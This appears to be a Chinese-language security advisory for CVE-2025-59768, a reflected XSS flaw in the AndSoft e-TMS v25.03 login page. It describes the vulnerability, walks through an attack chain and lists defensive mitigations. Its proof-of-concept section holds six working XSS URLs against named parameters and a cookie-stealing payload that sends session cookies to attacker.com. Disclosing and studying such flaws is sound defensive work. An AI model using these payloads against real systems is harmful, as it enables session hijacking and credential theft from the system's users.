CVE-2025-59768：AndSoft e-TMS 反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-59768

漏洞类型

反射型跨站脚本（Reflected XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AndSoft e-TMS v25.03

漏洞概述

CVE-2025-59768是AndSoft公司e-TMS（Electronic Transport Management System，电子运输管理系统）v25.03版本中存在的一个反射型跨站脚本（Reflected XSS）漏洞。该漏洞由西班牙国家网络安全研究所（INCIBE）于2025年10月2日披露，CVSS 3.1评分为6.1分，属于中危级别。

e-TMS是一款广泛应用于物流和运输行业的管理系统，用于处理运输订单、车辆调度、货物跟踪等业务。该系统在登录页面（/clt/LOGINFRM_MNG.ASP）中对多个参数缺乏充分的输入验证和输出编码，导致攻击者可以通过构造恶意URL，在受害者浏览器中执行任意JavaScript代码。

具体而言，受影响的参数包括'l'、'demo'、'demo2'、'TNTLOGIN'、'UO'和'SuppConn'共6个参数。这些参数在用户访问恶意链接时，会将攻击者注入的恶意脚本直接反射到返回的页面中，在受害者的浏览器上下文中执行。由于该漏洞无需认证即可利用（PR:N），且仅需要用户点击恶意链接（UI:R），因此在实际攻击场景中具有较高的可利用性。攻击者可以利用此漏洞窃取用户的会话凭证、执行未授权操作、进行钓鱼攻击或窃取敏感信息，对运输企业的业务安全构成威胁。

技术细节

该漏洞的根因在于e-TMS v25.03的登录管理页面（/clt/LOGINFRM_MNG.ASP）在处理用户输入参数时，未对以下6个参数进行适当的过滤或HTML实体编码：l、demo、demo2、TNTLOGIN、UO和SuppConn。

反射型XSS漏洞的利用原理如下：
1. 攻击者构造一个包含恶意JavaScript代码的URL，其中恶意代码被嵌入到上述参数的值中。
2. 攻击者通过钓鱼邮件、即时通讯工具或其他社会工程学手段诱导受害者点击该URL。
3. 受害者的浏览器向e-TMS服务器发送请求，服务器将URL中的参数值未经编码直接嵌入到返回的HTML页面中。
4. 浏览器解析返回的HTML时，将恶意JavaScript代码作为页面内容的一部分执行。
5. 由于脚本在受害者的会话上下文中执行，攻击者可以访问会话cookie、修改页面内容、窃取表单数据或执行其他恶意操作。

由于CVSS向量为AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N，表明该漏洞通过网络利用、攻击复杂度低、无需权限、但需要用户交互（如点击链接），且影响范围为Changed（脚本执行可能影响其他组件），对机密性和完整性有低影响，不影响可用性。

攻击链分析

STEP 1

步骤1：漏洞侦察

攻击者通过信息收集发现目标组织使用AndSoft e-TMS v25.03系统，定位到登录页面/clt/LOGINFRM_MNG.ASP，并识别出未经过滤的参数：l、demo、demo2、TNTLOGIN、UO和SuppConn。

STEP 2

步骤2：构造恶意URL

攻击者构造包含恶意JavaScript代码的URL，将payload嵌入到上述易受攻击的参数中，例如使用<script>alert(document.cookie)</script>或<img src=x onerror=...>等绕过方式。

STEP 3

步骤3：社工诱导

攻击者通过钓鱼邮件、即时通讯工具或社交媒体等方式，将恶意URL发送给e-TMS系统的合法用户，诱导其点击链接。

STEP 4

步骤4：触发XSS

受害者点击恶意链接后，浏览器向e-TMS服务器发起请求，服务器将未编码的参数值直接反射到响应页面中，恶意脚本在受害者浏览器中执行。

STEP 5

步骤5：信息窃取与进一步利用

恶意脚本在受害者会话上下文中执行，攻击者可以窃取会话cookie、劫持用户会话、进行钓鱼攻击、重定向用户到恶意网站，或利用窃取的凭证进行未授权访问。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-59768 PoC - Reflected XSS in AndSoft e-TMS v25.03 -->
<!-- Vulnerable endpoint: /clt/LOGINFRM_MNG.ASP -->
<!-- Vulnerable parameters: l, demo, demo2, TNTLOGIN, UO, SuppConn -->

<!-- Example 1: Basic XSS via 'l' parameter -->
https://target/clt/LOGINFRM_MNG.ASP?l=<script>alert('XSS-CVE-2025-59768')</script>

<!-- Example 2: XSS via 'demo' parameter -->
https://target/clt/LOGINFRM_MNG.ASP?demo=<script>alert(document.cookie)</script>

<!-- Example 3: XSS via 'demo2' parameter -->
https://target/clt/LOGINFRM_MNG.ASP?demo2=<script>alert(document.domain)</script>

<!-- Example 4: XSS via 'TNTLOGIN' parameter -->
https://target/clt/LOGINFRM_MNG.ASP?TNTLOGIN="><script>alert('XSS')</script>

<!-- Example 5: XSS via 'UO' parameter -->
https://target/clt/LOGINFRM_MNG.ASP?UO=<img src=x onerror=alert(1)>

<!-- Example 6: XSS via 'SuppConn' parameter -->
https://target/clt/LOGINFRM_MNG.ASP?SuppConn=<svg onload=alert(1)>

<!-- Example 7: Cookie stealing payload (for demonstration) -->
<!-- https://target/clt/LOGINFRM_MNG.ASP?l=<script>document.location="http://attacker.com/steal?c="+document.cookie</script> -->

影响范围

AndSoft e-TMS v25.03

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1）在Web服务器或反向代理层面部署WAF规则，过滤包含<script>、onerror=、onload=等XSS特征的请求；2）为所有响应添加Content-Security-Policy头，限制内联脚本执行；3）为所有会话cookie设置HttpOnly和Secure属性；4）对用户进行安全意识培训，谨慎点击来自不可信来源的链接，特别是包含可疑参数的URL；5）监控异常的用户会话和未授权操作行为，及时发现可能的攻击活动。